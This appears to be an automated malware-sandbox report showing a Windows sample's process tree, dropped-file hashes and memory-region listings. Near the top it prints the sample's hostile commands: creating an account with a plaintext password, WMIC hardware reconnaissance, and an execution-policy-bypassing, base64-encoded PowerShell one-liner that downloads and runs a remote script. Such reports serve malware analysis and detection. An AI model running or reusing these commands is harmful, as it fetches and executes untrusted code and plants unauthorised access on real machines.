C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc uc7YWrTP1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc uc7YWrTP2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc uc7YWrTP3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\2swqih2a\2swqih2a.dllMD5
565a30f7f4af35b549c830654303069e
SHA10214896ff8866856cbe9cac258842697df1a80de
SHA256223623460f848323cf676c73556863b8a1a30c59cbd9306047b8ce090d332d04
SHA5121bd5f0827e3adcac5f18ad9316a36b92640cb6e82be4337b76ccfc869928f16d00d0b4f35931c7986c001372db0839ebe310228d8e52ac602f44165e91db50ba
-
C:\Users\Admin\AppData\Local\Temp\3767.exeMD5
63151e4f7c3972f18a23c0e9996e14ef
SHA15d041fde6433a8ff8fc78a69fca1fd4630e3f270
SHA256cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
SHA512f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
-
C:\Users\Admin\AppData\Local\Temp\3767.exeMD5
63151e4f7c3972f18a23c0e9996e14ef
SHA15d041fde6433a8ff8fc78a69fca1fd4630e3f270
SHA256cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
SHA512f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
-
C:\Users\Admin\AppData\Local\Temp\RES5010.tmpMD5
b8ea36d7637385e0a1d68dc93e0a0aea
SHA16e1ca83a19b3d4ee98f7a95cb5b754b10b9700d1
SHA2564ca46f1d855e269f75cc15bc421a6e2d3854317b20cdb29b710e1d635e140e94
SHA512337d4a6b54ff331afdba6f8fef78ff77b50dc098e172e8461421741254067bc386421280209e1c14a2c91790dee06f0a7f8d7f01ea986fd211ae429cbd7e020e
-
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1MD5
f783019c5dc4a5477d1ffd4f9f512979
SHA137c8d1e5dd2ebce647c4e0a92f8598ebf2fdcc7b
SHA2564c81fee866a87b2de6e10640fe094f0db29258014177e294ac94a819940f5348
SHA51264d90352f4466f0097dd2c7ace8ccb155947dda8ae148c8c6ba1507a9e879247fab2eba452c812ba628a65de93cc096dabfcb23d2be4b525a92e5ef9e4b57d6a
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
\??\c:\Users\Admin\AppData\Local\Temp\2swqih2a\2swqih2a.0.csMD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\2swqih2a\2swqih2a.cmdlineMD5
47a31f85f924e91feab0fbfa94f21fde
SHA1b66c67b4821e6afb22669c2ef571368e2a6896a6
SHA25660f2957f4490a07e6ad7176cc051eb30639b34cea01d7e1830c0a637cc68cb57
SHA5121478827b888651c4c005008f558cb4d716344fb1ab6442f71c0fa5f0ae5617b46ffd0294747200fd4e22519dc7546c2c24314c0dfbad6a799383d995c1c6b9f7
-
\??\c:\Users\Admin\AppData\Local\Temp\2swqih2a\CSCBD3710FE722445B4ABAE1C68D47DEE80.TMPMD5
c6ca9ee8551fafbe02d4c0ff1ac8101c
SHA12105df499383daa43239a63fbcac4b6b32aa1f7e
SHA256fd915b325b877cdc5481cd37c223bb4f1aab60dcb5eb77119af8dd2a1722f2fa
SHA512fda53d9d1b11a6b1ffd43c7291ca1fe329942d0e8ba3c6732cf08e4ea0775f4e5c63d40cf5060507da5f2a18ad561c6258deb7531cf58c906f18a3ac937df3f5
-
\Windows\Branding\mediasrv.pngMD5
ac13d804585a74dc542db4ec94da39df
SHA18642ae2e04e492700caf41b43de9ef9d8b3c26f9
SHA25684c41dc018689fcb2fc4240f1e0267a5ee82232e3bcd541f5f5bed4139cfcd55
SHA5120ba869487fda38d398903df4235bd8f2d0f8fb774b559125ba278751a5a503adbb0557f9ea2fde5fecba4f1a33b71583be36fac0f6f8842cbee0bdd7ea2fb5bf
-
\Windows\Branding\mediasvc.pngMD5
9151c95451abb048a44f98d0afac8264
SHA122f447b210eb25c11be5a9c31f254f5f2bd50a78
SHA2568082bfe8a9f63854d6317cf6ddc0c18c54140ee5d179a96bfe9900c90d994518
SHA512728b140e68dcb6751cccb4d1046ac61f63e8db13d4f613b44e161d457f107acc11b3275167c7b4dff34a6d5966116ecb062f94713d0cf4f35b327d14ec7cbd13
-
memory/596-302-0x000001C7E2178000-0x000001C7E217A000-memory.dmpFilesize
8KB
-
memory/596-301-0x000001C7E2176000-0x000001C7E2178000-memory.dmpFilesize
8KB
-
memory/596-267-0x000001C7E2173000-0x000001C7E2175000-memory.dmpFilesize
8KB
-
memory/596-266-0x000001C7E2170000-0x000001C7E2172000-memory.dmpFilesize
8KB
-
memory/596-252-0x0000000000000000-mapping.dmp
-
memory/600-138-0x00000153F5A00000-0x00000153F5A01000-memory.dmpFilesize
4KB
-
memory/600-158-0x00000153F5DE0000-0x00000153F5DE1000-memory.dmpFilesize
4KB
-
memory/600-134-0x00000153F36A0000-0x00000153F36A2000-memory.dmpFilesize
8KB
-
memory/600-135-0x00000153F36A0000-0x00000153F36A2000-memory.dmpFilesize
8KB
-
memory/600-136-0x00000153F5110000-0x00000153F5112000-memory.dmpFilesize
8KB
-
memory/600-137-0x00000153F5113000-0x00000153F5115000-memory.dmpFilesize
8KB
-
memory/600-205-0x00000153F36A0000-0x00000153F36A2000-memory.dmpFilesize
8KB
-
memory/600-132-0x00000153F36A0000-0x00000153F36A2000-memory.dmpFilesize
8KB
-
memory/600-140-0x00000153F36A0000-0x00000153F36A2000-memory.dmpFilesize
8KB
-
memory/600-144-0x00000153F5116000-0x00000153F5118000-memory.dmpFilesize
8KB
-
memory/600-131-0x00000153F36A0000-0x00000153F36A2000-memory.dmpFilesize
8KB
-
memory/600-130-0x00000153F36A0000-0x00000153F36A2000-memory.dmpFilesize
8KB
-
memory/600-129-0x00000153F36A0000-0x00000153F36A2000-memory.dmpFilesize
8KB
-
memory/600-206-0x00000153F36A0000-0x00000153F36A2000-memory.dmpFilesize
8KB
-
memory/600-128-0x0000000000000000-mapping.dmp
-
memory/600-166-0x00000153F5118000-0x00000153F5119000-memory.dmpFilesize
4KB
-
memory/600-159-0x00000153F6170000-0x00000153F6171000-memory.dmpFilesize
4KB
-
memory/600-152-0x00000153F5140000-0x00000153F5141000-memory.dmpFilesize
4KB
-
memory/600-133-0x00000153F50D0000-0x00000153F50D1000-memory.dmpFilesize
4KB
-
memory/824-370-0x0000000000000000-mapping.dmp
-
memory/836-368-0x0000000000000000-mapping.dmp
-
memory/940-148-0x0000000000000000-mapping.dmp
-
memory/1088-381-0x0000000000000000-mapping.dmp
-
memory/1088-387-0x000001FDF2C00000-0x000001FDF2C02000-memory.dmpFilesize
8KB
-
memory/1088-388-0x000001FDF2C03000-0x000001FDF2C05000-memory.dmpFilesize
8KB
-
memory/1088-396-0x000001FDF2C06000-0x000001FDF2C08000-memory.dmpFilesize
8KB
-
memory/1088-422-0x000001FDF2C08000-0x000001FDF2C09000-memory.dmpFilesize
4KB
-
memory/1336-369-0x0000000000000000-mapping.dmp
-
memory/1508-201-0x00000197D2F86000-0x00000197D2F88000-memory.dmpFilesize
8KB
-
memory/1508-168-0x00000197B8E90000-0x00000197B8E92000-memory.dmpFilesize
8KB
-
memory/1508-177-0x00000197D2F83000-0x00000197D2F85000-memory.dmpFilesize
8KB
-
memory/1508-178-0x00000197B8E90000-0x00000197B8E92000-memory.dmpFilesize
8KB
-
memory/1508-180-0x00000197B8E90000-0x00000197B8E92000-memory.dmpFilesize
8KB
-
memory/1508-181-0x00000197B8E90000-0x00000197B8E92000-memory.dmpFilesize
8KB
-
memory/1508-176-0x00000197D2F80000-0x00000197D2F82000-memory.dmpFilesize
8KB
-
memory/1508-202-0x00000197B8E90000-0x00000197B8E92000-memory.dmpFilesize
8KB
-
memory/1508-203-0x00000197B8E90000-0x00000197B8E92000-memory.dmpFilesize
8KB
-
memory/1508-174-0x00000197B8E90000-0x00000197B8E92000-memory.dmpFilesize
8KB
-
memory/1508-173-0x00000197B8E90000-0x00000197B8E92000-memory.dmpFilesize
8KB
-
memory/1508-167-0x0000000000000000-mapping.dmp
-
memory/1508-221-0x00000197D2F88000-0x00000197D2F8A000-memory.dmpFilesize
8KB
-
memory/1508-169-0x00000197B8E90000-0x00000197B8E92000-memory.dmpFilesize
8KB
-
memory/1508-170-0x00000197B8E90000-0x00000197B8E92000-memory.dmpFilesize
8KB
-
memory/1508-171-0x00000197B8E90000-0x00000197B8E92000-memory.dmpFilesize
8KB
-
memory/1628-376-0x0000000000000000-mapping.dmp
-
memory/1660-367-0x0000000000000000-mapping.dmp
-
memory/1680-264-0x000001D76ECB6000-0x000001D76ECB8000-memory.dmpFilesize
8KB
-
memory/1680-223-0x000001D76ECB3000-0x000001D76ECB5000-memory.dmpFilesize
8KB
-
memory/1680-265-0x000001D76ECB8000-0x000001D76ECBA000-memory.dmpFilesize
8KB
-
memory/1680-222-0x000001D76ECB0000-0x000001D76ECB2000-memory.dmpFilesize
8KB
-
memory/1680-211-0x0000000000000000-mapping.dmp
-
memory/1724-372-0x0000000000000000-mapping.dmp
-
memory/1748-145-0x0000000000000000-mapping.dmp
-
memory/1848-374-0x0000000000000000-mapping.dmp
-
memory/1964-373-0x0000000000000000-mapping.dmp
-
memory/1968-371-0x0000000000000000-mapping.dmp
-
memory/2012-377-0x0000000000000000-mapping.dmp
-
memory/2160-353-0x0000000000000000-mapping.dmp
-
memory/2208-361-0x0000000000000000-mapping.dmp
-
memory/2256-360-0x0000000000000000-mapping.dmp
-
memory/2448-363-0x0000000000000000-mapping.dmp
-
memory/2480-362-0x0000000000000000-mapping.dmp
-
memory/2644-449-0x0000000000000000-mapping.dmp
-
memory/2692-357-0x0000000000000000-mapping.dmp
-
memory/2748-358-0x0000000000000000-mapping.dmp
-
memory/3032-118-0x0000000000450000-0x0000000000466000-memory.dmpFilesize
88KB
-
memory/3116-314-0x0000000000000000-mapping.dmp
-
memory/3188-352-0x0000000000000000-mapping.dmp
-
memory/3244-359-0x0000000000000000-mapping.dmp
-
memory/3248-375-0x0000000000000000-mapping.dmp
-
memory/3316-117-0x0000000000400000-0x0000000002EF4000-memory.dmpFilesize
43.0MB
-
memory/3316-115-0x0000000002FE0000-0x0000000002FE8000-memory.dmpFilesize
32KB
-
memory/3316-116-0x0000000002FF0000-0x0000000002FF9000-memory.dmpFilesize
36KB
-
memory/3452-379-0x0000000000000000-mapping.dmp
-
memory/3456-315-0x0000000000000000-mapping.dmp
-
memory/3564-378-0x0000000000000000-mapping.dmp
-
memory/3592-313-0x0000000000000000-mapping.dmp
-
memory/3640-380-0x0000000000000000-mapping.dmp
-
memory/3688-450-0x0000000000000000-mapping.dmp
-
memory/3812-356-0x0000000000000000-mapping.dmp
-
memory/3936-366-0x0000000000000000-mapping.dmp
-
memory/3988-125-0x0000015C2CC13000-0x0000015C2CC15000-memory.dmpFilesize
8KB
-
memory/3988-122-0x0000015C45840000-0x0000015C45C3F000-memory.dmpFilesize
4.0MB
-
memory/3988-119-0x0000000000000000-mapping.dmp
-
memory/3988-126-0x0000015C2CC15000-0x0000015C2CC16000-memory.dmpFilesize
4KB
-
memory/3988-124-0x0000015C2CC10000-0x0000015C2CC12000-memory.dmpFilesize
8KB
-
memory/3988-127-0x0000015C2CC16000-0x0000015C2CC17000-memory.dmpFilesize
4KB